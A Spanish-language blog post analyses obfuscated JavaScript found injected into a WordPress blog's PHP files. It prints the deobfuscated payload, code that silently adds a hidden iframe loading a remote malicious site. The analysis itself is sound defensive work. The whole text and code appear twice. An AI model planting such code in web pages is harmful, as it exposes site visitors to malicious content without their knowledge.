Recientemente han caído en mis manos unos archivos .PHP pertenecientes a un blog basado en "Wordpress". Estos archivos habían sido alterados insertando código malicioso escrito en JavaScript ofuscado para dificultar su interpretación.
Inicialmente el atacante ha infectado todos los archivos de código del blog insertando tanto al comienzo de los mismos como al final, una o varias líneas de código javascript con una longitud de unos 1800 caracteres.
Así que como tenía un rato libre me dije, a ver de qué va este pedacito de código…
El primer paso ha sido tabular el código de forma adecuada para facilitar su lectura, con lo cual han quedado unas 130 líneas de código. A continuación he realizado una primera pasada de limpieza del código eliminando todo el código inservible utilizado para la ofuscación y, finalmente con el "código bueno" entre las manos, cuya longitud era de 13 líneas de código útil se podía ver perfectamente las primeras intenciones.
Han utilizado "codificado de cadenas de texto" para dificultar su lectura, control de excepciones para realizar varios reintentos de carga de una web remota ( www [dot] ladenas938 [dot] com ), la cual era cargada en un IFRAME oculto y creado desde el propio script anexándolo al BODY del blog.
En un fin otro juguete más con el que andan enredando los del lado oscuro ¡qué le vamos a hacer!
En cualquier caso para los que queráis verlo, aquí os dejo el código limpio del script (la parte TRY):
var c = 120;
var u = "body";
var x = String( "appendChild" );
var xE = document;
var f = String("iframe");
var uS = "createElement";
var g = xE[uS](f);
var cA = String("visibility");
g.height = c;
g.width = c;
g.src = String("http://www.ladenas938.com/users/5");
g.style[cA] = "hidden";
xE[u][x](g);
Inicialmente el atacante ha infectado todos los archivos de código del blog insertando tanto al comienzo de los mismos como al final, una o varias líneas de código javascript con una longitud de unos 1800 caracteres.
Así que como tenía un rato libre me dije, a ver de qué va este pedacito de código…
El primer paso ha sido tabular el código de forma adecuada para facilitar su lectura, con lo cual han quedado unas 130 líneas de código. A continuación he realizado una primera pasada de limpieza del código eliminando todo el código inservible utilizado para la ofuscación y, finalmente con el "código bueno" entre las manos, cuya longitud era de 13 líneas de código útil se podía ver perfectamente las primeras intenciones.
Han utilizado "codificado de cadenas de texto" para dificultar su lectura, control de excepciones para realizar varios reintentos de carga de una web remota ( www [dot] ladenas938 [dot] com ), la cual era cargada en un IFRAME oculto y creado desde el propio script anexándolo al BODY del blog.
En un fin otro juguete más con el que andan enredando los del lado oscuro ¡qué le vamos a hacer!
En cualquier caso para los que queráis verlo, aquí os dejo el código limpio del script (la parte TRY):
var c = 120;
var u = "body";
var x = String( "appendChild" );
var xE = document;
var f = String("iframe");
var uS = "createElement";
var g = xE[uS](f);
var cA = String("visibility");
g.height = c;
g.width = c;
g.src = String("http://www.ladenas938.com/users/5");
g.style[cA] = "hidden";
xE[u][x](g);
Comentarios
Publicar un comentario